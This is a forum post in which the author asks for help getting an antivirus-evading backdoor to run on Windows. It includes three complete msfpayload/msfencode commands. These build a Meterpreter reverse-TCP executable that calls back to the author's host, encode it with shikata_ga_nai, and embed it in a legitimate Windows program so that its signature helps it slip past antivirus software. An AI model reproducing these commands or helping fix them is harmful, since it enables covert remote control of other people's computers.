First time in the forums, so, if necessary, kindly direct me to the right place if this isn't where I should post this question.

So I'm trying to make an executable backdoor file that I can open on another computer in my network so that I can use meterpreter. I did that fine with this:

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4445 x > /root/backdoor.exe
I get the exe, open it on the target computer and it works fine. My problem however is that basically any AV software will pick this up. So I tried encoding it:

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=4444 R| msfencode -c 5 -e x86/shikata_ga_nai -x > /root/EncodedBackdoor.exe
Ok, now I have an encoded executable, I get it to the target computer, open it, and get a message saying that "the file cannot be opened on windows".

I've also tried using the same code (more or less) to hide the backdoor inside of a Microsoft executable to use its signature to get past the AV, but I still have the same problem. Here's what I use to do that if it helps any:

Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=4444 R| msfencode -c 5 -e x86/shikata_ga_nai -x > /root/windows-software.exe -t exe > /root/newtest.exe
The "windows-software.exe" being a legit windows program.

Suggestions on how to make windows recognize these encoded backdoors as files it can open is what I'm looking for.